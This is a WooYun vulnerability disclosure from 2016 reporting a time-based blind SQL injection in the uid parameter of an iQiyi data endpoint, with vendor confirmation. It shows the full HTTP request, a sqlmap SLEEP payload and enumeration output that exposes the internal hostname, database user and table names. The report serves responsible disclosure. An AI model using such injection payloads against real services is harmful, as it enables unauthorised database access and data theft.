当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0188452

漏洞标题:爱奇艺某分站time盲注(泄漏部分内网信息)

相关厂商:奇艺

漏洞作者: sauce

提交时间:2016-03-24 09:05

修复时间:2016-05-08 10:10

公开时间:2016-05-08 10:10

漏洞类型:

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-24: 细节已通知厂商并且等待厂商处理中
2016-03-24: 厂商已经确认,细节仅向厂商公开
2016-04-03: 细节向核心白帽子及相关领域专家公开
2016-04-13: 细节向普通白帽子公开
2016-04-23: 细节向实习白帽子公开
2016-05-08: 细节向公众公开

简要描述:

rt

详细说明:

POST /send_core_info?uid=865700021218002&plat=222&ver=2.0.106 HTTP/1.1
Host: ndct.data.video.qiyi.com
User-Agent: QY-Player-Android/2.0.106
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1066
{"version":"2.0","userID":"1209531862","ra":1,"tvid":"449747800","pform":6,"play_process":{"file_type":"F4V","hcdn_code":"13","step":3,"access_vrs":{"url":"http://cache.video.qiyi.com/vps?tvid=449747800&vid=8619c4c122f01ba70d5d45ce73e7646c&uid=1209531862&v=0&qypid=449747800_33&src=02022001010000000000&t=1458704349000&k_tag=1&k_uid=865700021218002&rs=1&vf=ec92d0a1519a58746ce9457f7f564b47","ip":"106.38.219.22","duration":344,"code":200,"return_data":""},"access_vip":{"url":"","ip":"","duration":0,"code":0,"return_data":""},"access_pdata":{"url":"http://data.video.qiyi.com/videos/v0/20160212/34/b2/9068a56cf18079e67665946f01f05bc7.f4v?qd_tvid=449747800&qd_vipres=0&qd_index=1&qd_aid=449747800&qd_stert=0&qd_scc=c6a193db5b6b1ed90e5323b1336ade72&qd_sc=a4f559061be96311318c6bc786e57297&qd_src=02022001010000000000&qd_ip=2ac82210&qd_uid=1209531862&qd_tm=1458704371000&qd_vip=0","ip":"106.38.178.240","duration":254,"code":200,"return_data":""},"cache_status":{"url":"","ip":"","duration":0,"code":0,"return_data":"","avgspeed":0,"302url":"","idc":"netcnc_oversea"}}}


注入参数在uid 但必须带上post数据
目测是一个测试网络环境的数据库 仅证明存在 未深入

漏洞证明:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: uid=865700021218002' AND (SELECT * FROM (SELECT(SLEEP(5)))GNYW) AND 'gEVx'='gEVx&plat=222&ver=2.0.106
---
back-end DBMS: MySQL 5.0.12
banner: '5.6.26-log'
current user: 'netdoctor[email protected]%.%.%'
current database: 'netdoctor'
hostname: '10.77.48.51'
current user is DBA: False
database management system users [1]:
[*] 'netdoctor'@'10.%.%.%'
database management system users privileges:
[*] %netdoctor% [1]:
privilege: USAGE
database management system users roles:
[*] %netdoctor% [1]:
role: USAGE
available databases [2]:
[*] information_schema
[*] netdoctor
Database: netdoctor
[5 tables]
+---------------+
| ndct_client |
| ndct_cmd |
| ndct_coreinfo |
| ndct_hcdninfo |
| ndct_pingback |
+---------------+

修复方案:

版权声明:转载请注明来源 sauce@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-03-24 10:10

厂商回复:

感谢您对爱奇艺PPS的关注,我们将尽快修复

最新状态:

暂无